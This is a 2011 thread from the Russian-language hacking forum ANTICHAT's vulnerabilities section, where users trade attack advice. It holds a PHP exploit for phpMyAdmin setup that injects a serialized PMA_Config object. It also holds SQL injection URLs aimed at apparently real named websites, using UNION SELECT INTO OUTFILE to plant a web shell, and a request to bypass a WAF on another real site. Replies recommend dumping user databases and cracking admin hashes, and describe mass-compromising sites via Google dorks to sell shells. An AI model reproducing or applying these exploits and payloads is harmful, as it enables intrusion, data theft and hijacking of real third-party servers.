HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #17601  
Старый 16.07.2011, 18:39
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Цитата:
Сообщение от maxfax  
maxfax said:
Здравствуйте, меня вот интересует такой вопрос, вот к примеру вы нашли sql инъекцию подобрали количество колонок - одним словом можете выполнять произвольные запросы, а что вы дальше делаете залить shell через sql инъекцию это наверное 0.5% из 100 так как не будет прав на это, ну украдете хеш админа и будете клянчить на форуме "расшифруйте пожалуйста мне хеш" или брутить будете его пол года, это все что можно выжать их sql инъекции ?
можно сдампить базу на стопицот мульонов акков и юзать её.

а насчёт хеша, так в большинстве случаев он удачно брутиться или его вообще нет, т.к. пассы в plaintext.
 
Ответить с цитированием

  #17602  
Старый 16.07.2011, 18:39
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от maxfax  
maxfax said:
Здравствуйте, меня вот интересует такой вопрос, вот к примеру вы нашли sql инъекцию подобрали количество колонок - одним словом можете выполнять произвольные запросы, а что вы дальше делаете залить shell через sql инъекцию это наверное 0.5% из 100 так как не будет прав на это, ну украдете хеш админа и будете клянчить на форуме "расшифруйте пожалуйста мне хеш" или брутить будете его пол года, это все что можно выжать их sql инъекции ?
1.XSS в SQL-инъекции - В парить админу, получить доступ в админку и залить шелл.

2. Знакомые Хэш-крякеры, платные сервисы взлома хэшей.

3. Если инъекция в UPDATE, INSERT... - Можно подменить данные в СуБДД

4. Поискать другие уязвимости - если их использовать вместе, можно получить наилучший результат.

5. Ну и конечно DoS ещё никто не отменял + с помощью инъекции можно узнать не только логины и хаш, а другие очень полезные данные.
 
Ответить с цитированием

  #17603  
Старый 16.07.2011, 19:25
maxfax
Guest
Сообщений: n/a
Провел на форуме:
8037

Репутация: 0
По умолчанию

Спасибо,за быстрые ответы, с вашего позволения еще один вопрос изложу:

Один раз мне нужно было купить несколько трафистых shell-ов я обратился к одному человеку по рекомендации он мне говорит какой нужен траф и в какой зоне shell-ы нужны, я говорю траф 20к +- 5к зона de, он говорит могу за 5 дней достать shell-ов нулевок на каждом будет трафа 10-15 чел-сутки но вообщем будет траф 20к.

Сделка так и не состоялась по моей вене!

Меня собственно интересует такие вопросы:

1) как люди добывают такое количество shell-лов

2) это супер-пупер гениально умные,космические хакеры

3) может это развод
 
Ответить с цитированием

  #17604  
Старый 16.07.2011, 20:26
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Цитата:
Сообщение от maxfax  
maxfax said:
Меня собственно интересует такие вопросы:
1) как люди добывают такое количество shell-лов
2) это супер-пупер гениально умные,космические хакеры
3) может это развод
находится бага (или берётся в паблике) на каком-нибудь популярном (или не популярном) движке, с помощью которой можно залить шелл. далее по доркам парсится выдача гугла на наличие сайтов на данном движке.
 
Ответить с цитированием

  #17605  
Старый 16.07.2011, 23:47
plaeer
Guest
Сообщений: n/a
Провел на форуме:
34360

Репутация: 1
По умолчанию

Ребятки помогите со сплоитом под пхпмуадмин:

Цитата:
Сообщение от None  
*/
//Настройки
//отправляем http-данные
//$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent
function send_data($method, $url, $data = '', $referer_string = '', $cookie_string = '', $ua_string = '')
{
$return = '';
$feof_count = 0;
$parsed_url = parse_url($url);
$site = $parsed_url['host'];
$path = $parsed_url['path'];
$query = $parsed_url['query'];
($method == 'GET' && !empty($data)) ? $path .= '?'.$data : '';
($method == 'POST' && !empty($query)) ? $path .= '?'.$query : '';
$fp = fsockopen($site, 80, $errno, $errstr, 30);
($method == 'POST') ? $out = "POST $path HTTP/1.1\r\n" : $out = "GET $path HTTP/1.1\r\n";
$out .= "Host: $site\r\n";
$out .= "Content-type: application/x-www-form-urlencoded\r\n";
$out .= "Connection: Close\r\n";
$out .= "User-Agent: $ua_string\r\n";
$out .= "Referer: $referer_string\r\n";
$out .= "Cookie: $cookie_string\r\n";
($method == 'POST') ? $out .= "Content-Length: ".strlen($data)."\r\n\r\n" : $out .= "\r\n";
($method == 'POST') ? fwrite($fp, $out.$data) : fwrite($fp, $out);
while (!feof($fp))
{
if($feof_count >=200)
break;
$return .= fread($fp, 4800);
++$feof_count;
}
fclose($fp);
return $return;
}
$token_page = send_data('GET',$pma_setup_url,'',$pma_setup_url,' ','Opera');
preg_match('@name="token" value="([a-f0-9]{32})"@is',$token_page,$token_array);
$token = $token_array[1];
preg_match_all('@Set-Cookie: ([^\r\n;]+)@is',$token_page,$cookie_array);
$cookie_array = $cookie_array[1];
$cookie_array = implode("; ",$cookie_array);
print send_data('POST',$pma_setup_url,'action=lay_naviga tion&eoltype=unix&token='.$token.'&configuration=' .urlencode('a:1:{i:0;O:10:"PMA_Config":1:{s:6:"sou rce";s:'.strlen($ftp_code).':"'.$ftp_code.'";}}'), $pma_setup_url,$cookie_array,'Opera');
?>
А именно вообще не понятна вот эта строка:

Цитата:
Сообщение от None  
//$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent
 
Ответить с цитированием

  #17606  
Старый 17.07.2011, 00:18
Cybersteger
Познающий
Регистрация: 09.10.2009
Сообщений: 31
Провел на форуме:
287607

Репутация: 19
По умолчанию

Цитата:
Сообщение от plaeer  
plaeer said:
А именно вообще не понятна вот эта строка:
эта строка закоментирована, она не играет роли сплойт рабочий.
 
Ответить с цитированием

  #17607  
Старый 17.07.2011, 00:30
plaeer
Guest
Сообщений: n/a
Провел на форуме:
34360

Репутация: 1
По умолчанию

Цитата:
Сообщение от Cybersteger  
Cybersteger said:
эта строка закоментирована, она не играет роли сплойт рабочий.
Закоментиовал, настроил сплоит, получил:

HTTP/1.1 401 Authorization Required Date: Sat, 16 Jul 2011 19:28:19 GMT Server: Apache WWW-Authenticate: Basic realm="phpMyAdmin Setup" Vary: Accept-Encoding Content-Length: 401 Connection: close Content-Type: text/html; charset=iso-8859-1

Authorization Required

This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.

Дыра закрыта?
 
Ответить с цитированием

  #17608  
Старый 17.07.2011, 03:35
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от plaeer  
plaeer said:
Закоментиовал, настроил сплоит, получил:
HTTP/1.1 401 Authorization Required Date: Sat, 16 Jul 2011 19:28:19 GMT Server: Apache WWW-Authenticate: Basic realm="phpMyAdmin Setup" Vary: Accept-Encoding Content-Length: 401 Connection: close Content-Type: text/html; charset=iso-8859-1
Authorization Required
This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.
Дыра закрыта?
просто базовая авторизация стоит на папку пма и/или setup
 
Ответить с цитированием

  #17609  
Старый 18.07.2011, 02:28
l.e.a.d.e.r
Новичок
Регистрация: 13.06.2009
Сообщений: 0
Провел на форуме:
6741

Репутация: 0
По умолчанию

Подскажите как правильно заливать шелл через sql-inj.

Код:
Code:
Warning: mktime() expects parameter 6 to be long, string given in /web/sites/_j/_u/_b/jubilee-centre.org/public/www/apps/documents/classes.php on line 45
поля 6 и 9

_http://www.jubilee-centre.org/document.php?id=16-999.9+union+select+1,2,3,4,5,'',7,8,9+from+informa tion_schema.tables+into+outfile+'/web/sites/_j/_u/_b/jubilee-centre.org/public/www/s.php'--+1--

не знаю как с правами на запись, это какой-то хостинг, нету таблици user, ну ее не выводит точно)

и опять 25, я что-то не так мб делаю?

Код:
Code:
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,2,3,4,5,6,7--+
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,'',3,4,5,6,7+INTO+OUTFILE '/home/virtwww/w_miroboew-kaz-ru_37979ae4/http/1.php'--+
 
Ответить с цитированием

  #17610  
Старый 18.07.2011, 02:54
Sc0rpi0n
Новичок
Регистрация: 23.02.2010
Сообщений: 3
Провел на форуме:
46117

Репутация: 76
Отправить сообщение для Sc0rpi0n с помощью ICQ
По умолчанию

Помогите плиз обойти WAF

http://www.shungitclub.ru/category_page.php?cat=21&sub=union+select+1,2,+fro m+mysql.user--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ